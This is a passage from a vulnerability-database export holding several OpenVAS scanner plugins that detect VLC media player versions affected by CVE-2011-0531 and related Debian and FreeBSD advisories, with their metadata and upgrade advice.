secpod_vlc_media_player_code_exec_vuln_lin.nasl 7024 2017-08-30 11:51:43Z teissa $\n#\n# VLC Media Player '.mkv' Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted MKV file.\n Impact Level: Application\";\ntag_affected = \"VLC media player version 1.1.6.1 and prior on Linux\";\ntag_insight = \"The flaw is due to an input validation error within the 'MKV_IS_ID'\n macro in 'modules/demux/mkv/mkv.hpp' of the MKV demuxer, when parsing the\n MKV file.\";\ntag_solution = \"Upgrade to the VLC media player version 1.1.7 or later,\n For updates refer to http://download.videolan.org/pub/videolan/vlc/\";\ntag_summary = \"The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.\";\n\nif(description)\n{\n script_id(902339);\n script_version(\"$Revision: 7024 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 
Feb 2011)\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"VLC Media Player '.mkv' Code Execution Vulnerability (Linux)\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/65045\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1025018\");\n\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_lin.nasl\");\n script_require_keys(\"VLCPlayer/Lin/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get the version from KB\nvlcVer = get_kb_item(\"VLCPlayer/Lin/Ver\");\nif(!vlcVer){\n exit(0);\n}\n\n## Check for VLC Media Player Version less than 1.1.7\nif(version_is_less(version:vlcVer, test_version:\"1.1.7\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:55:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 2159-1.", "modified": "2017-07-07T00:00:00", "published": "2011-03-07T00:00:00", "id": "OPENVAS:68993", "href": "http://plugins.openvas.org/nasl.php?oid=68993", "type": "openvas", "title": "Debian Security Advisory DSA 2159-1 (vlc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2159_1.nasl 
6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2159-1 (vlc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Dan Rosenberg discovered that insufficient input validation in VLC's\nprocessing of Matroska/WebM containers could lead to the execution of\narbitrary code.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze3.\n\nThe version of vlc in the oldstable distribution (lenny) is affected\nby further issues and will be addressed in a followup DSA.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.7-1.\n\nWe recommend that you upgrade your vlc packages.\";\ntag_summary = \"The remote host is missing an update to vlc\nannounced via advisory DSA 2159-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202159-1\";\n\n\nif(description)\n{\n script_id(68993);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 
2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 16:04:02 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0531\");\n script_name(\"Debian Security Advisory DSA 2159-1 (vlc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libvlc-dev\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc5\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlccore-dev\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlccore4\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-data\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-dbg\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-fluidsynth\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-notify\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-pulse\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svg\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-zvbi\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2011-03-05T00:00:00", "id": "OPENVAS:136141256231068956", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068956", "type": "openvas", "title": "FreeBSD Ports: vlc", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n# $Id: freebsd_vlc4.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID f9258873-2ee2-11e0-afcd-0015f2db7bde\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68956\");\n script_version(\"$Revision: 11762 $\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-05 22:25:39 +0100 (Sat, 05 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: vlc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: vlc\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.videolan.org/security/sa1102.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/f9258873-2ee2-11e0-afcd-0015f2db7bde.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"vlc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.7\")<0) {\n txt += 'Package vlc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 2159-1.", "modified": "2019-03-18T00:00:00", "published": "2011-03-07T00:00:00", "id": "OPENVAS:136141256231068993", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068993", "type": "openvas", "title": "Debian Security Advisory DSA 2159-1 (vlc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2159_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2159-1 (vlc)\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68993\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 16:04:02 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0531\");\n script_name(\"Debian Security Advisory DSA 2159-1 (vlc)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202159-1\");\n script_tag(name:\"insight\", value:\"Dan Rosenberg discovered that insufficient input validation in VLC's\nprocessing of Matroska/WebM containers could lead to the execution of\narbitrary code.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze3.\n\nThe version of vlc in the oldstable distribution (lenny) is affected\nby further issues and will be addressed in a followup DSA.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.7-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your vlc packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to vlc\nannounced via advisory DSA 2159-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libvlc-dev\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlc5\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlccore-dev\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlccore4\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-data\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-dbg\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-fluidsynth\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-notify\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-pulse\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svg\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-zvbi\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0522", "CVE-2011-0531", "CVE-2010-1441", "CVE-2010-3275", "CVE-2010-1442", "CVE-2010-3276"], "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 2211-1.", "modified": "2019-03-18T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:136141256231069555", "href": 
"http://plugins.openvas.org/nasl.php?oid=136141256231069555", "type": "openvas", "title": "Debian Security Advisory DSA 2211-1 (vlc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2211_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2211-1 (vlc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69555\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3275\", \"CVE-2010-3276\", \"CVE-2010-0522\", \"CVE-2010-1441\", \"CVE-2010-1442\", \"CVE-2011-0531\");\n script_name(\"Debian Security Advisory DSA 2211-1 (vlc)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202211-1\");\n script_tag(name:\"insight\", value:\"Ricardo Narvaja discovered that missing input sanitising in VLC, a\nmultimedia player and streamer, could lead to the execution of arbitrary\ncode if a user is tricked into opening a malformed media file.\n\nThis update also provides updated packages for oldstable (lenny) for\nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159.\n(CVE-2010-0522, CVE-2010-1441, CVE-2010-1442, CVE-2011-0531)\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.6.h-4+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.8-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your vlc packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to vlc\nannounced via advisory DSA 2211-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libvlc0\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlc0-dev\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc\", 
ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-arts\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-esd\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-glide\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlc-dev\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlc5\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlccore-dev\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlccore4\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-data\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-dbg\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) 
!= NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-fluidsynth\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-notify\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-pulse\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svg\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-zvbi\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0522", "CVE-2011-0531", "CVE-2010-1441", "CVE-2010-3275", "CVE-2010-1442", "CVE-2010-3276"], "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 2211-1.", "modified": "2017-07-07T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:69555", "href": "http://plugins.openvas.org/nasl.php?oid=69555", "type": "openvas", "title": "Debian Security Advisory DSA 2211-1 (vlc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2211_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2211-1 (vlc)\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ricardo Narvaja discovered that missing input sanitising in VLC, a\nmultimedia player and 